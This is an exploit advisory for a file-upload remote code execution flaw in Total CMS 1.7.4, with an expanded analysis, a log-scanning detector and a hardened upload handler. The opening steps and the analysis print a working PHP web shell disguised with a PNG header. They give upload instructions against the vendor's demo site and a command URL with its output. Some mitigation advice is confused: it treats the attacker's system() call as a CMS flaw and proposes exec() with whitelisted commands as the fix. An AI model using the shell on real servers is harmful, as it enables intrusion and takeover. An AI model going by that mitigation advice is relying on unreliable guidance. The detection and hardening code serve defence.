Total CMS 1.7.4 - Remote Code Execution (RCE)

Exploit Author: tmrswrr
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-06-04
# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE)
# Date: 02/06/2023
# Exploit Author: tmrswrr
# Version: 1.7.4
# Vendor home page : https://www.totalcms.co/

1) Go to this page and click the edit page button:
https://www.totalcms.co/demo/soccer/
2) Scroll down and you will see the downloads area.
3) Add a shell.php file to this area with the following content:


?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>
IEND

4) Then open the uploaded file and pass commands to it:

https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id
Result:

?PNG ...

uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)

IEND


Total CMS 1.7.4 – Remote Code Execution (RCE) Vulnerability Analysis

Security researchers and ethical hackers have recently uncovered a critical vulnerability in Total CMS 1.7.4, a widely used content management system (CMS) designed for small to medium-sized websites. This flaw, identified as a Remote Code Execution (RCE) vulnerability, allows attackers to execute arbitrary commands on the server hosting the CMS, potentially leading to full system compromise.

Exploitation Overview

The vulnerability arises from improper file upload handling in the downloads section of the CMS. Specifically, when users access the edit page feature on the demo site (https://www.totalcms.co/demo/soccer/), they gain access to a file upload area where no strict validation or sanitization is applied.

Attackers can exploit this by uploading a malicious PHP file, commonly referred to as a web shell, that contains executable code. Once uploaded, the file is reachable at a predictable URL under the upload directory, which gives remote command execution.

Step-by-Step Exploit Demonstration

  • Access the demo page: Navigate to https://www.totalcms.co/demo/soccer/ and click the edit page button.
  • Locate the downloads area: Scroll down to the file upload section labeled "downloads."
  • Upload the malicious shell: Upload a file named shell.php with the following content:

<?php echo "<pre>"; system($_REQUEST['cmd']); echo "</pre>"; ?>

Explanation: This PHP script is a minimal web shell. It uses the system() function to execute shell commands passed via the cmd parameter in the HTTP request. The output is wrapped in <pre> tags to preserve formatting and make results easier to read. This allows an attacker to run any command on the server, such as id, ls, or whoami.

Command Execution Example

After uploading the shell, the attacker can access it via:


https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id

Upon execution, the server responds with:


uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)

Insight: This output shows that the web server process runs as the caddy user (also a member of the www-data group), an account with limited privileges. It is still a critical finding: any command execution capability enables further reconnaissance, privilege escalation, or data exfiltration.
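The request shown above is what a defender would look for in the web server's access log. The following PHP CLI script is an added example, not part of the original advisory or of Total CMS: it parses constructed combined-format log lines (the addresses and timestamps are made up; only the depot path and the shell.php?cmd=id request mirror the advisory) and flags any request for a server-side script under the /cms-data/depot/ upload path, or any request to that path carrying a cmd parameter. The UPLOAD_PREFIX value and the SCRIPT_EXT list are assumptions for the example.

```php
<?php
// Added example, not part of the original advisory or of Total CMS: scan
// access-log lines for requests that fetch a server-side script from the
// CMS upload path, where only static downloads should ever be served.
declare(strict_types=1);

const UPLOAD_PREFIX = '/cms-data/depot/';   // assumed: path uploads are served from
const SCRIPT_EXT = ['php', 'phtml', 'php3', 'php5', 'phar', 'pl', 'cgi'];

// Constructed sample lines in combined log format (addresses/times made up).
function sampleLog(): string
{
    return <<<'LOG'
203.0.113.7 - - [02/Jun/2023:10:14:03 +0000] "GET /demo/soccer/ HTTP/1.1" 200 5123
203.0.113.7 - - [02/Jun/2023:10:15:40 +0000] "POST /cms-data/depot/cmssoccerdepot/ HTTP/1.1" 200 88
203.0.113.7 - - [02/Jun/2023:10:16:02 +0000] "GET /cms-data/depot/cmssoccerdepot/shell.php?cmd=id HTTP/1.1" 200 312
198.51.100.4 - - [02/Jun/2023:10:16:30 +0000] "GET /cms-data/depot/cmssoccerdepot/brochure.pdf HTTP/1.1" 200 40211
198.51.100.4 - - [02/Jun/2023:10:17:11 +0000] "GET /cms-data/depot/cmssoccerdepot/logo.png HTTP/1.1" 200 7731
LOG;
}

// Split one log line into its fields; returns null for lines that do not parse.
function parseLine(string $line): ?array
{
    // ip ident user [time] "METHOD target proto" status size
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})/';
    if (preg_match($re, $line, $m) !== 1) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int) $m[5]];
}

// Return a reason string when the request looks like web-shell access, else null.
function classify(array $req): ?string
{
    $path = parse_url($req['target'], PHP_URL_PATH);
    if (!is_string($path) || !str_starts_with($path, UPLOAD_PREFIX)) {
        return null;                                // not the upload area at all
    }
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (in_array($ext, SCRIPT_EXT, true)) {
        return 'server-side script requested from upload path';
    }
    $query = parse_url($req['target'], PHP_URL_QUERY);
    if (is_string($query)) {
        parse_str($query, $params);
        if (isset($params['cmd'])) {
            return 'cmd parameter sent to upload path';
        }
    }
    return null;
}

// Scan a whole log and return one alert line per suspicious request.
function scanLog(string $log): array
{
    $alerts = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parseLine($line);
        if ($req === null) {
            continue;
        }
        $why = classify($req);
        if ($why !== null) {
            $alerts[] = sprintf('[%s] %s %s %s status=%d -> %s', $req['time'],
                $req['ip'], $req['method'], $req['target'], $req['status'], $why);
        }
    }
    return $alerts;
}

if (PHP_SAPI === 'cli') {
    foreach (scanLog(sampleLog()) as $alert) {
        echo $alert, PHP_EOL;
    }
}
```

On the sample lines only the shell.php request is reported; the editor's upload POST and the static .pdf and .png downloads pass. In practice the status code matters too: a 200 for a .php file under the upload path means the server actually executed it, whereas a 403 or 404 shows the execution block is working, so an alert rule would normally weight the two differently.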

Security Implications

While the demo site uses a non-production environment, this vulnerability highlights a dangerous design flaw in the actual CMS deployment:

  • Unrestricted file uploads: The system allows any file type to be uploaded without validation, opening the door for malicious PHP scripts.
  • Exposed file paths: Uploaded files are stored in predictable, publicly accessible directories, making them easy to locate and exploit.
  • Direct command execution: The use of system() with user-supplied input creates a direct RCE vector.

Recommended Mitigations

To prevent exploitation, administrators and developers should implement the following security measures:

  • Disable file uploads in public areas: Restrict file uploads to authenticated, admin-only interfaces with strict validation.
  • Sanitize file extensions: Only allow safe file types (e.g., .pdf, .txt, .jpg) and block .php, .phtml, .pl, etc.
  • Store uploads outside web root: Place uploaded files in a directory not accessible via HTTP to prevent direct execution.
  • Use parameterized commands: Replace system($_REQUEST['cmd']) with safer alternatives like exec() with whitelisted commands.
  • Implement logging and monitoring: Track file uploads and command execution attempts for anomaly detection.
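As an added example of the upload-related recommendations above (this is not Total CMS code; the upload field name, the storage path, the PHP 8 and fileinfo requirements, and the precondition that the request is already authenticated as an editor are all assumptions), here is a PHP handler that enforces an extension allowlist, checks the sniffed MIME type against that extension, refuses files carrying PHP or script tags even when they begin with a valid image header, stores them under a random server-chosen name outside the web root, and serves them back only as attachments:

```php
<?php
// Added example, not Total CMS code: a hardened handler for a "downloads"
// upload area. Assumptions: the request is already authenticated as an
// editor, $_FILES['download'] holds the upload, UPLOAD_DIR is a directory
// outside the web root that PHP can write to, PHP 8.0+ and the fileinfo
// extension are available.
declare(strict_types=1);

const UPLOAD_DIR = '/var/lib/totalcms-uploads';   // assumed path, never served by HTTP
const MAX_BYTES  = 10 * 1024 * 1024;

// Allowed extensions, each mapped to the MIME type its bytes must sniff as.
const ALLOWED = [
    'pdf'  => 'application/pdf',
    'txt'  => 'text/plain',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
];

/**
 * Check an upload's name and content. Returns the accepted extension, or a
 * string starting with "reject:" that says why the file was refused.
 */
function validateUpload(string $originalName, string $bytes): string
{
    $len = strlen($bytes);
    if ($len === 0 || $len > MAX_BYTES) {
        return 'reject: empty or too large';
    }
    // Exactly one extension, taken from the base name, so "shell.php",
    // "shell.phtml" and "shell.php.png" are all refused at this point.
    $parts = explode('.', basename($originalName));
    if (count($parts) !== 2 || $parts[0] === '' || $parts[1] === '') {
        return 'reject: file name must be name.ext';
    }
    $ext = strtolower($parts[1]);
    if (!array_key_exists($ext, ALLOWED)) {
        return 'reject: extension not allowed';
    }
    // The bytes must sniff as the type the extension claims.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if ($mime !== ALLOWED[$ext]) {
        return "reject: content sniffs as $mime, not " . ALLOWED[$ext];
    }
    // Defence in depth against the PNG-header-plus-PHP trick from the advisory:
    // a valid image signature does not make embedded PHP tags harmless if some
    // misconfiguration ever executes the file, so refuse them outright.
    if (preg_match('/<\?(php\b|=)|<script\b/i', $bytes) === 1) {
        return 'reject: executable markup inside file';
    }
    return $ext;
}

/**
 * Store a validated upload under a server-generated name outside the web
 * root and return the opaque id that the download endpoint will accept.
 */
function storeUpload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK) {
        http_response_code(400);
        exit('upload failed');
    }
    $result = validateUpload($file['name'], (string) file_get_contents($file['tmp_name']));
    if (str_starts_with($result, 'reject:')) {
        error_log(sprintf('upload refused from %s name=%s (%s)',
            $_SERVER['REMOTE_ADDR'] ?? '-', $file['name'], $result));
        http_response_code(400);
        exit('file not accepted');
    }
    $id = bin2hex(random_bytes(16));              // never the user-supplied name
    $dest = UPLOAD_DIR . '/' . $id . '.' . $result;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        http_response_code(500);
        exit('could not store file');
    }
    error_log("upload stored id=$id ext=$result");
    return $id;
}

/** Stream a stored file by id as an attachment; the bytes are never executed. */
function serveUpload(string $id): void
{
    if (preg_match('/^[a-f0-9]{32}$/', $id) !== 1) {
        http_response_code(404);
        exit;
    }
    $hits = glob(UPLOAD_DIR . '/' . $id . '.*');
    if ($hits === false || count($hits) !== 1) {
        http_response_code(404);
        exit;
    }
    $ext = pathinfo($hits[0], PATHINFO_EXTENSION);   // always an ALLOWED key here
    header('Content-Type: ' . ALLOWED[$ext]);
    header('Content-Disposition: attachment; filename="download.' . $ext . '"');
    header('X-Content-Type-Options: nosniff');
    readfile($hits[0]);
}

if (isset($_FILES['download'])) {
    echo storeUpload($_FILES['download']);
} elseif (isset($_GET['id'])) {
    serveUpload((string) $_GET['id']);
}
```

The advisory's payload, a PNG header followed by PHP, is refused here at more than one point: as shell.php it fails the extension allowlist, and if it were renamed to a .png it would pass the MIME sniff (libmagic only looks at the signature) but fail the tag scan. Pair the handler with a web server rule that disables PHP handlers for any directory that stores uploads, so that a file which somehow slips through is still served as bytes rather than executed.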

Expert-Level Insight

From a cybersecurity perspective, this vulnerability exemplifies a classic insecure file upload issue. It underscores the importance of the principle of least privilege and the need for defense-in-depth strategies. Even in seemingly benign systems like Total CMS, a single flaw can cascade into full system compromise if exploited in a real-world environment.

Attackers could use this RCE to:

  • Deploy persistent backdoors (e.g., reverse shells).
  • Steal sensitive data (e.g., database credentials, user information).
  • Propagate attacks to other systems via lateral movement.
  • Install malware or ransomware.

For organizations using Total CMS 1.7.4, immediate patching or migration to a more secure version is strongly advised. The vendor should be notified and urged to release a security update.

Conclusion

The Total CMS 1.7.4 RCE vulnerability serves as a stark reminder that even simple CMS platforms can harbor severe security risks. It emphasizes the need for rigorous input validation, secure file handling, and proactive security monitoring. Developers and administrators must treat every file upload as a potential attack vector and implement robust safeguards to protect their infrastructure.